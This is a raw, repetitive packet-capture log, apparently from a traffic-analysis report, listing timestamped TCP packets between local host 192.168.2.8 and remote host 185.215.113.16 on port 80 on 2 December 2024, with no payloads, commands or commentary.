                                                                                                                                                                                                        Dec 2, 2024 07:37:59.039741993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.039828062 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.040579081 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.040627003 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.040755033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.041491985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.041575909 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.041656017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.042454958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.042467117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.042521000 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.043410063 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.043425083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.043463945 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.044369936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.044384003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.044430971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.045170069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.045221090 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.045337915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.046021938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.046096087 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.046178102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.047043085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.047063112 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.047101021 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.047883034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.047960997 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.048053980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.048847914 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.048923969 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.048993111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.049619913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.049679041 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.049765110 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.050766945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.050780058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.050874949 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.051615000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.051671982 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.051767111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.052424908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.052539110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.052567005 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.053334951 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.053396940 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.053639889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.053705931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.053718090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.053828001 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.055454016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.055476904 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.055514097 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.056413889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.056480885 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.056581020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.057233095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.057305098 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.057394981 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.057991028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.058043957 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.058135033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.058880091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.059063911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.059101105 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.105675936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.200421095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.200613976 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.200726986 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.200916052 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.200982094 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.201116085 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.201839924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.201850891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.201915979 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.202778101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.214960098 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.214973927 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.215044022 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.215393066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.215460062 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.215495110 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.216319084 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.216368914 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.216433048 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.217303038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.217365026 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.217407942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.218189955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.218250990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.218259096 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.219069958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.219166994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.219173908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.219970942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.220026970 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.220078945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.220906973 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.220985889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.220994949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.221821070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.221889019 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.221899033 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.222723007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.222784996 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.222817898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.223642111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.223730087 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.223747969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.224589109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.224639893 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.224679947 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.225549936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.225600004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.225600958 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.226614952 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.226674080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.226675987 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.227317095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.227368116 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.227416992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.228245020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.228321075 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.228348017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.229140997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.229213953 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.229248047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.230072975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.230158091 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.230179071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.230993986 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.231050014 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.231086016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.231930971 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.231988907 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.232028008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.232798100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.232877970 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.232904911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.233726978 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.233789921 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.233823061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.234850883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.234922886 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.234961987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.235574007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.235631943 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.235675097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.236475945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.236535072 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.236573935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.237396002 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.237479925 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.237492085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.238308907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.238373041 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.238409042 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.239216089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.239279032 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.239329100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.240135908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.240223885 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.240247011 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.241044044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.241133928 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.241167068 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.241986990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.242085934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.242094994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.242897034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.242959976 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.242995024 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.243828058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.243890047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.243892908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.244731903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.244812965 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.244849920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.245668888 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.245728970 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.245759964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.246551991 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.246608973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.246675014 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.247505903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.247564077 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.247602940 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.248404026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.248482943 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.248517990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.249396086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.249464989 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.249582052 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.250261068 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.250305891 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.250345945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.251327038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.251389027 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.251466990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.252134085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.252199888 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.252218008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.253024101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.253094912 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.253114939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.253904104 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.253966093 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.253999949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.254820108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.254892111 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.254925013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.255834103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.255902052 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.255923986 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.256676912 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.256742954 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.256887913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.257580042 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.257632971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.257684946 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.258531094 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.258616924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.258635044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.259418011 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.259486914 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.259495020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.308763981 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.401892900 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.402009010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.402086973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.402378082 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.402487040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.402595043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.403255939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.403331995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.403408051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.404242039 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.416311026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.416404963 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.416413069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.416690111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.416712046 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.416754007 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.417593002 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.417671919 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.417673111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.418538094 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.418601990 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.418662071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.419455051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.419538975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.419563055 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.420352936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.420411110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.420449972 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.421331882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.421377897 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.421399117 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.422188997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.422270060 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.422302961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.423113108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.423167944 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.423243046 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.424015045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.424067020 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.424154997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.424954891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.425007105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.425015926 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.425849915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.425894976 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.425915003 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.426764965 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.426817894 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.426908016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.427706957 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.427812099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.427812099 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.428627014 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.428724051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.428725958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.429529905 CET8049719185.215.113.16192.168.2.8
